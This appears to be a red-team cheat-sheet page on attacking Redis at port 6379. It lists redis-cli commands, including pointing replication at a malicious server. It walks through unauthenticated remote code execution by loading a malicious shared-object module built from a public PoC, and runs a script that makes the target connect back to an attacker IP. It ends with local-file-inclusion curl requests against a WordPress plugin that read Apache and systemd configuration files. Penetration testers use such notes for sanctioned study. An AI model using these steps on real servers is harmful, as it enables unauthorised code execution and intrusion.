6379 - Redis

Redis is an open-source, in-memory key-value data store used for high-performance caching, message brokering, and real-time analytics. It supports a variety of data structures like strings, hashes, lists, sets, and sorted sets, and operates entirely in memory for speed, with optional persistence to disk. By default, Redis listens on TCP port 6379 and has no authentication or encryption unless explicitly configured, which often makes it a target during red team operations. The default configuration file is located at /etc/redis/redis.conf.

Usage

redis-cli -u redis://target:port
> INFO
> ACL WHOAMI # List current context
> ACL LIST # List user's ACL
> CONFIG GET DIR # List on-disk persistence directories
> CONFIG SET DIR /tmp # Change directory
> SLAVEOF 10.10.10.10 8080 # Point replication to a malicious server

Unauthenticated Root RCE

In Redis 4.x and 5.x instances the ability to load shared object (.so) modules at runtime can leveraged to gain RCE. Exploitation requires two conditions to be met:

  1. Privileged Access to Redis → The attacker must be able to issue privileged Redis commands such as MODULE LOAD. This is possible if the Redis instance is exposed to the internet without authentication or the attacker has acquired valid credentials to an authenticated instance. In addition, Redis must not restrict module loading; unless explicitly disabled, this capability is broadly accessible in insecure deployments.

  2. Writable Location on Target Filesystem → The attacker must be able to place a malicious .so file on the target machine. Two main techniques can be used:

    1. Abuse Redis’s persistence settings: using CONFIG SET dir and CONFIG SET dbfilename, combined with SAVE, an attacker can write arbitrary files to locations such as /tmp/.

    2. Upload externally: if another service (e.g., FTP) exposes a writable path, the attacker can upload the .so file and instruct Redis to load it by its absolute path.

Once the malicious module is in place, Redis will load it and execute the attacker's code within the server's process space, effectively achieving RCE. For either case, a .so file must be created. This can be done via the original PoC or its modified more modern version:

$ git clone https://github.com/CSpanias/redis-module-rce && cd redis-module-rce && make
<SNIP>
gcc -Wall -fPIC -O2 -std=gnu99 -Imodule -shared -o module.so module/module.c

$ cd redis-module-rce
$ ls -l module.so
-rwxr-xr-x 1 x7331 x7331 38704 Aug  1 14:29 module.so

$ file module.so
module.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=c35119dc82e22bb135fb85215b9c0f40c98edde4, not stripped

This PoC can be used to leverage the Redis settings:

./redis-rce.py --rhost redis-instance --lhost 192.168.45.170

Authenticated RCE

The apache configuration file (/etc/apache2/sites-enabled/000-default.conf) can be used to find the webroot and the Redis service configuration (/etc/systemd/system/redis.service) can be used to find writable paths:

# Find the webroot (e.g. via LFI)
$ curl http://wp-instance/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/apache2/sites-enabled/000-default.conf

DocumentRoot /var/www/html
 
$ curl http://wp-instance/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/systemd/system/redis.service          

ReadWriteDirectories=-/etc/redis
ReadWriteDirectories=-/opt/redis-files
Previous27017 - MongoDBNextSQL

Last updated

Was this helpful?